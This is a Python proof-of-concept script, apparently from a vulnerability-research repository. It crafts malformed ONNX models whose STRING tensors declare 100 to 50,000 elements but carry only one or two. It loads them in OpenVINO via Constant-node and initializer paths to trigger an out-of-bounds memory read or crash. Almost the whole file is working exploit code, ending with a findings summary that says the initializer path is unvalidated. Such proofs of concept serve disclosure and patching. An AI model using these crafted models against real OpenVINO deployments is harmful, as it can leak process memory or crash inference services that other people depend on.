# Repository: openvino-string-tensor-oob-poc / poc_string_tensor_oob.py
# Author: hackthesoul — commit c68ce31 ("Add string tensor OOB PoC")
"""
OpenVINO ONNX Frontend - String Tensor OOB Read PoC
Vulnerability: OpenVINO's ONNX frontend does not validate that string_data
count matches the declared dims in TensorProto. A STRING tensor with
dims=[100] but only 2 string_data entries causes out-of-bounds memory access.
Environment: OpenVINO 2026.0.0, onnx 1.20.1
"""
import os
import sys
import signal
import tempfile
import traceback
import onnx
from onnx import TensorProto, helper, numpy_helper
import openvino
# Record the exact library versions this PoC was run against, so results
# can be reproduced against the same builds.
_banner = (
    f"[*] OpenVINO version: {openvino.__version__}",
    f"[*] ONNX version: {onnx.__version__}",
    "",
)
for _line in _banner:
    print(_line)
# ============================================================
# Approach 1: Constant node with mismatched string tensor attr
# ============================================================
# A Constant node carries the malicious tensor as its "value" attribute.
# The protobuf API happily accepts dims=[100] with only 2 string_data
# entries; the question is whether OpenVINO validates the mismatch.
print("=" * 60)
print("[Approach 1] Constant node with STRING tensor attribute")
print(" dims=[100], string_data has only 2 entries")
print("=" * 60)
try:
    # Build the malicious string tensor by hand (helper.make_tensor would
    # reject the count/dims mismatch, so the raw TensorProto API is used).
    tensor_value = TensorProto()
    tensor_value.name = "str_const"
    tensor_value.data_type = TensorProto.STRING
    tensor_value.dims.append(100)  # Declare 100 strings
    tensor_value.string_data.append(b"hello")  # Only provide 2
    tensor_value.string_data.append(b"world")
    # Constant node that outputs this tensor
    const_node = helper.make_node(
        "Constant",
        inputs=[],
        outputs=["string_output"],
        value=tensor_value,
    )
    # Identity to consume the output (keeps graph valid)
    identity_node = helper.make_node(
        "Identity",
        inputs=["string_output"],
        outputs=["final_output"],
    )
    # Graph output type - string tensor
    output_info = helper.make_tensor_value_info(
        "final_output", TensorProto.STRING, [100]
    )
    graph = helper.make_graph(
        [const_node, identity_node],
        "string_oob_test",
        [],  # no inputs
        [output_info],
    )
    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 17)])
    model.ir_version = 8
    # Save to temp file
    model_path = os.path.join(tempfile.gettempdir(), "string_oob_const.onnx")
    onnx.save(model, model_path)
    print(f"[+] Saved malicious model to: {model_path}")
    print(f"[+] Model file size: {os.path.getsize(model_path)} bytes")
    # Verify the dims/string_data mismatch survived the round-trip to disk.
    loaded = onnx.load(model_path)
    for node in loaded.graph.node:
        if node.op_type == "Constant":
            for attr in node.attribute:
                if attr.name == "value":
                    t = attr.t
                    declared = int(t.dims[0])
                    actual = len(t.string_data)
                    print(f"[+] Declared dims: [{declared}], actual string_data count: {actual}")
                    print(f"[+] Mismatch: {declared - actual} entries will be OOB reads")
    # Now load with OpenVINO
    print("\n[*] Loading model with openvino.Core().read_model()...")
    core = openvino.Core()
    try:
        ov_model = core.read_model(model_path)
        print(f"[!] Model loaded successfully (no validation error)")
        print(f"[!] Model outputs: {ov_model.outputs}")
        # Try to compile and infer
        print("[*] Attempting to compile model...")
        compiled = core.compile_model(ov_model, "CPU")
        print("[!] Model compiled successfully")
        print("[*] Attempting inference...")
        # Model has no inputs, so an empty feed dict is passed;
        # result is presumably a numpy array of strings — verify on target.
        result = compiled({})[0]
        print(f"[!] Inference completed. Output shape: {result.shape}")
        print(f"[!] Output dtype: {result.dtype}")
        # Print first few and last few entries to see OOB content
        print(f"[!] First 5 entries: {result.flat[:5]}")
        if len(result.flat) > 5:
            print(f"[!] Last 5 entries: {result.flat[-5:]}")
        print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")
    except Exception as e:
        # Inner handler: an OpenVINO-side rejection means validation exists
        # on this code path; log it rather than treating it as PoC failure.
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()
except Exception as e:
    # Outer handler: model construction/serialization itself failed.
    print(f"[-] Approach 1 failed: {type(e).__name__}: {e}")
    traceback.print_exc()
print()
# ============================================================
# Approach 2: Graph initializer with mismatched string tensor
# ============================================================
# Same mismatched tensor, but delivered as a graph initializer instead of
# a Constant attribute — initializers are deserialized on a different
# frontend code path that may skip the validation.
print("=" * 60)
print("[Approach 2] Graph initializer with STRING tensor")
print(" dims=[100], string_data has only 2 entries")
print("=" * 60)
try:
    # Build the malicious string tensor as initializer
    init_tensor = TensorProto()
    init_tensor.name = "str_init"
    init_tensor.data_type = TensorProto.STRING
    init_tensor.dims.append(100)
    init_tensor.string_data.append(b"AAA")
    init_tensor.string_data.append(b"BBB")
    # Identity node just forwards the initializer to a graph output.
    identity_node2 = helper.make_node(
        "Identity",
        inputs=["str_init"],
        outputs=["init_output"],
    )
    output_info2 = helper.make_tensor_value_info(
        "init_output", TensorProto.STRING, [100]
    )
    # Also declare the initializer as a graph input (required by some ONNX versions)
    input_info2 = helper.make_tensor_value_info(
        "str_init", TensorProto.STRING, [100]
    )
    graph2 = helper.make_graph(
        [identity_node2],
        "string_oob_init_test",
        [input_info2],
        [output_info2],
        initializer=[init_tensor],
    )
    model2 = helper.make_model(graph2, opset_imports=[helper.make_opsetid("", 17)])
    model2.ir_version = 8
    model_path2 = os.path.join(tempfile.gettempdir(), "string_oob_init.onnx")
    onnx.save(model2, model_path2)
    print(f"[+] Saved malicious model to: {model_path2}")
    print(f"[+] Model file size: {os.path.getsize(model_path2)} bytes")
    # Verify mismatch
    loaded2 = onnx.load(model_path2)
    for init in loaded2.graph.initializer:
        if init.data_type == TensorProto.STRING:
            declared = int(init.dims[0])
            actual = len(init.string_data)
            print(f"[+] Initializer '{init.name}': dims=[{declared}], string_data count={actual}")
            print(f"[+] Mismatch: {declared - actual} OOB entries")
    print("\n[*] Loading model with openvino.Core().read_model()...")
    core2 = openvino.Core()
    try:
        ov_model2 = core2.read_model(model_path2)
        print(f"[!] Model loaded successfully (no validation error)")
        print(f"[!] Model outputs: {ov_model2.outputs}")
        print("[*] Attempting to compile model...")
        compiled2 = core2.compile_model(ov_model2, "CPU")
        print("[!] Model compiled successfully")
        print("[*] Attempting inference...")
        # Empty feed dict: the "input" is satisfied by the initializer.
        result2 = compiled2({})[0]
        print(f"[!] Inference completed. Output shape: {result2.shape}")
        print(f"[!] Output dtype: {result2.dtype}")
        print(f"[!] First 5 entries: {result2.flat[:5]}")
        if len(result2.flat) > 5:
            print(f"[!] Last 5 entries: {result2.flat[-5:]}")
        print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")
    except Exception as e:
        # OpenVINO rejected the model — validation exists on this path.
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()
except Exception as e:
    # Model construction/serialization failed before OpenVINO was involved.
    print(f"[-] Approach 2 failed: {type(e).__name__}: {e}")
    traceback.print_exc()
print()
# ============================================================
# Approach 3: Extreme mismatch - dims=[10000], 1 string
# ============================================================
# Same shape as Approach 1 but with a far larger gap between declared
# and actual element counts, to push an unchecked read well past the
# allocation and make a crash more likely.
print("=" * 60)
print("[Approach 3] Extreme mismatch - dims=[10000], 1 string_data")
print(" More likely to trigger crash/segfault")
print("=" * 60)
try:
    tensor3 = TensorProto()
    tensor3.name = "extreme_str"
    tensor3.data_type = TensorProto.STRING
    tensor3.dims.append(10000)
    tensor3.string_data.append(b"X")  # Only 1 string for 10000 slots
    const_node3 = helper.make_node(
        "Constant",
        inputs=[],
        outputs=["extreme_output"],
        value=tensor3,
    )
    identity_node3 = helper.make_node(
        "Identity",
        inputs=["extreme_output"],
        outputs=["extreme_final"],
    )
    output_info3 = helper.make_tensor_value_info(
        "extreme_final", TensorProto.STRING, [10000]
    )
    graph3 = helper.make_graph(
        [const_node3, identity_node3],
        "extreme_oob_test",
        [],
        [output_info3],
    )
    model3 = helper.make_model(graph3, opset_imports=[helper.make_opsetid("", 17)])
    model3.ir_version = 8
    model_path3 = os.path.join(tempfile.gettempdir(), "string_oob_extreme.onnx")
    onnx.save(model3, model_path3)
    print(f"[+] Saved model: {model_path3}")
    print("[*] Loading with OpenVINO...")
    core3 = openvino.Core()
    try:
        ov_model3 = core3.read_model(model_path3)
        print(f"[!] Model loaded (dims=[10000], 1 string)")
        print("[*] Compiling...")
        compiled3 = core3.compile_model(ov_model3, "CPU")
        print("[!] Compiled successfully")
        print("[*] Running inference (may segfault)...")
        # Flush stdout NOW: if inference segfaults, buffered output would
        # otherwise be lost, hiding where the process died.
        sys.stdout.flush()
        result3 = compiled3({})[0]
        print(f"[!] Inference completed. Shape: {result3.shape}")
        print(f"[!] First 3: {result3.flat[:3]}")
        # Probe the very last declared slot — the deepest OOB offset.
        print(f"[!] Entry [9999]: {result3.flat[9999]}")
        print("[!!!] EXTREME OOB READ - 10000 entries from 1 string")
    except Exception as e:
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()
except Exception as e:
    print(f"[-] Approach 3 failed: {type(e).__name__}: {e}")
    traceback.print_exc()
print()
# ============================================================
# Approach 4: Extreme initializer - dims=[50000], 1 string
# ============================================================
# Combines the unvalidated initializer path (Approach 2) with an extreme
# count mismatch (Approach 3): 50000 declared slots backed by 1 string.
print("=" * 60)
print("[Approach 4] Extreme initializer - dims=[50000], 1 string_data")
print(" Initializer path bypasses Constant node validation")
print("=" * 60)
try:
    tensor4 = TensorProto()
    tensor4.name = "extreme_init"
    tensor4.data_type = TensorProto.STRING
    tensor4.dims.append(50000)
    tensor4.string_data.append(b"X")  # 1 string for 50000 slots
    identity_node4 = helper.make_node(
        "Identity",
        inputs=["extreme_init"],
        outputs=["extreme_init_out"],
    )
    output_info4 = helper.make_tensor_value_info(
        "extreme_init_out", TensorProto.STRING, [50000]
    )
    # Matching graph input declaration, as in Approach 2.
    input_info4 = helper.make_tensor_value_info(
        "extreme_init", TensorProto.STRING, [50000]
    )
    graph4 = helper.make_graph(
        [identity_node4],
        "extreme_init_oob",
        [input_info4],
        [output_info4],
        initializer=[tensor4],
    )
    model4 = helper.make_model(graph4, opset_imports=[helper.make_opsetid("", 17)])
    model4.ir_version = 8
    model_path4 = os.path.join(tempfile.gettempdir(), "string_oob_extreme_init.onnx")
    onnx.save(model4, model_path4)
    print(f"[+] Saved model: {model_path4}")
    print("[*] Loading with OpenVINO...")
    core4 = openvino.Core()
    try:
        ov_model4 = core4.read_model(model_path4)
        print(f"[!] Model loaded (dims=[50000], 1 string) - NO VALIDATION!")
        print("[*] Compiling...")
        compiled4 = core4.compile_model(ov_model4, "CPU")
        print("[!] Compiled successfully")
        print("[*] Running inference...")
        # Flush before the call that may crash the process (see Approach 3).
        sys.stdout.flush()
        result4 = compiled4({})[0]
        print(f"[!] Inference completed. Shape: {result4.shape}, dtype: {result4.dtype}")
        print(f"[!] First 5: {result4.flat[:5]}")
        # Deepest declared slot; repr() shows any garbage bytes read OOB.
        print(f"[!] Entry [49999]: {repr(result4.flat[49999])}")
        print("[!!!] EXTREME OOB READ via initializer - 50000 entries from 1 string")
    except Exception as e:
        print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
        traceback.print_exc()
except Exception as e:
    print(f"[-] Approach 4 failed: {type(e).__name__}: {e}")
    traceback.print_exc()
print()
# Final report: which frontend code paths validated the tensor and which
# allowed the out-of-bounds access.
_findings = [
    "=" * 60,
    "[*] PoC complete.",
    "",
    "[*] FINDINGS:",
    "[*] - Constant node path: VALIDATED (shape vs data size check at tensor.cpp:581)",
    "[*] - Initializer path: NOT VALIDATED - OOB read confirmed!",
    "[*] The initializer code path in the ONNX frontend skips the",
    "[*] string_data count vs dims validation, allowing OOB memory access.",
    "[*] An attacker can craft an ONNX model with a STRING initializer",
    "[*] where dims >> string_data count, causing reads beyond the",
    "[*] allocated string_data buffer during model loading/inference.",
    "=" * 60,
]
print("\n".join(_findings))